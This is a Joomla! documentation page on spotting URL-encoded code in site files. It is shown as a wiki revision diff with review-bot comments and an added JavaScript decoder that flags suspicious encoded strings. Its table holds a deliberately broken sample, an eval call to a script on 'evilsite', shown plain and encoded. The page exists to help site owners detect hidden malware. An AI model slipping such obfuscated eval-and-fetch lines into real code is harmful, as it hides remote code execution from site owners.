What are these strange (URL-Encoded) characters doing in your code?
From Joomla! Documentation
(Difference between revisions)
(New page: == What are these strange (URL-Encoded) characters doing in my code? == Overview Attackers sometimes hide code away from prying eyes by URL Encoding it. The purpose of URL Encoding is t...) |
m (eliminate repeating the title and table markup into wikitable markup) |
||
| (One intermediate revision by one user not shown) | |||
| Line 1: | Line 1: | ||
| − | == | + | == Overview == |
| − | + | ||
| − | + | ||
Attackers sometimes hide code away from prying eyes by URL Encoding it. | Attackers sometimes hide code away from prying eyes by URL Encoding it. | ||
| Line 11: | Line 9: | ||
Here are some trivial, non-functioning examples of URL Encoded text: | Here are some trivial, non-functioning examples of URL Encoded text: | ||
| − | + | {| class="wikitable" | |
| − | + | !Original | |
| − | + | !URL Encoded | |
| − | + | |- | |
| − | + | |this line has spaces | |
| − | + | |this%20line%20has%20spaces | |
| − | + | |- | |
| − | + | |eval(evil_script(http://www.evilsite/?evilscript.pl")); | |
| − | + | |%65val%28%65%76il_%73cri%70t<br/> | |
| − | + | %28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73<br/> | |
| − | + | cript.%70l%22%29%29%3B | |
| − | + | |} | |
| − | %28%68tt%70%3A//%77%77%77. | + | |
| − | %65%76il%73ite/%3F%65%76il%73 | + | |
| − | cript.%70l%22%29%29%3B | + | |
| − | + | ||
| − | + | ||
'''Resources''' | '''Resources''' | ||
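Review bot: In the second table row, the Original cell `eval(evil_script(http://www.evilsite/?evilscript.pl"));` closes a double quote that is never opened, and the encoded cell carries the same lone `%22` near its end, so the pair decodes to an unbalanced string. Either add the opening quote after `evil_script(` with a matching `%22` after the second `%28`, or drop the stray quote from both cells. The `<br/>` breaks inside the encoded cell also split one value across three lines, so a reader who copies it into a decoder picks up the breaks; a short remark that the three lines form a single string would help.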
| Line 37: | Line 30: | ||
<!-- KEEP THIS AT THE END OF THE PAGE --> | <!-- KEEP THIS AT THE END OF THE PAGE --> | ||
| + | <noinclude> | ||
[[Category:Security]] | [[Category:Security]] | ||
| − | + | [[Category:FAQ]] | |
| − | + | ||
[[Category:FAQ]] | [[Category:FAQ]] | ||
[[Category:Administration FAQ]] | [[Category:Administration FAQ]] | ||
| − | [[Category:Version 1.5 FAQ]] | + | [[Category:Version 1.5 FAQ]]</noinclude> |
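Review bot: `[[Category:FAQ]]` is added on the new side directly above an unchanged `[[Category:FAQ]]` line, so the resulting revision lists that category twice; one of the two lines should be dropped. The new `<noinclude>` opens before `[[Category:Security]]` and closes on the `[[Category:Version 1.5 FAQ]]` line, which is balanced, but putting `</noinclude>` on its own line would make the pairing easier to see in later edits.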
Latest revision as of 16:06, 17 October 2012
Overview
Attackers sometimes hide code away from prying eyes by URL Encoding it.
The purpose of URL encoding is to allow characters that are not valid in a URL to be passed via the URL. There are many legitimate reasons for doing this, such as hiding email from spammers and dealing with spaces in file names.
However, if you find odd, URL-encoded text in your site's files, you should investigate immediately. URL-encoded text is very easy to translate using PHP, JavaScript, or one of the many free online translators.
Here are some trivial, non-functioning examples of URL Encoded text:
| Original | URL Encoded |
|---|---|
| this line has spaces | this%20line%20has%20spaces |
| eval(evil_script(http://www.evilsite/?evilscript.pl")); | %65val%28%65%76il_%73cri%70t%28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73cript.%70l%22%29%29%3B |
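One way to do the translation in JavaScript while reviewing a file, as an added example that is not part of the original Joomla! page. The function names, the two-escape threshold and the sample text (constructed from the two table rows above) are assumptions; the "needless" count relies on the fact that letters and digits never have to be escaped in a URL, which is what separates the second row from the first.

```javascript
const ESCAPE = /%([0-9A-Fa-f]{2})/g;

// Decode for human review only; the result is never executed.
// decodeURIComponent throws URIError when the escapes are not valid UTF-8,
// so fall back to decoding byte by byte.
function decodeForReview(token) {
  try {
    return decodeURIComponent(token);
  } catch (e) {
    return token.replace(ESCAPE, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  }
}

// Letters, digits, "-", ".", "_" and "~" are the RFC 3986 unreserved set:
// a legitimate encoder has no reason to escape them.
function isUnreserved(byte) {
  return /[A-Za-z0-9\-._~]/.test(String.fromCharCode(byte));
}

// One finding per whitespace-delimited token holding at least minEscapes escapes.
function findEncodedRuns(text, minEscapes = 2) {
  const findings = [];
  text.split(/\r?\n/).forEach((lineText, i) => {
    for (const token of lineText.split(/\s+/)) {
      const bytes = [...token.matchAll(ESCAPE)].map(m => parseInt(m[1], 16));
      if (bytes.length < minEscapes) continue;
      findings.push({
        line: i + 1,
        encoded: token,
        decoded: decodeForReview(token),
        escapes: bytes.length,
        needless: bytes.filter(isUnreserved).length, // escaped letters/digits
      });
    }
  });
  return findings;
}

// Constructed sample: the two table rows placed inside made-up file lines.
const sample = [
  "<a href=\"this%20line%20has%20spaces\">ok</a>",
  "<?php $x = '%65val%28%65%76il_%73cri%70t%28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73cript.%70l%22%29%29%3B'; ?>",
].join("\n");

for (const f of findEncodedRuns(sample)) {
  console.log(`line ${f.line}: ${f.escapes} escapes, ${f.needless} needless -> ${f.decoded}`);
}
```

A token whose escapes are mostly needless, like the second sample line, is the kind of text the page says to investigate.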
Resources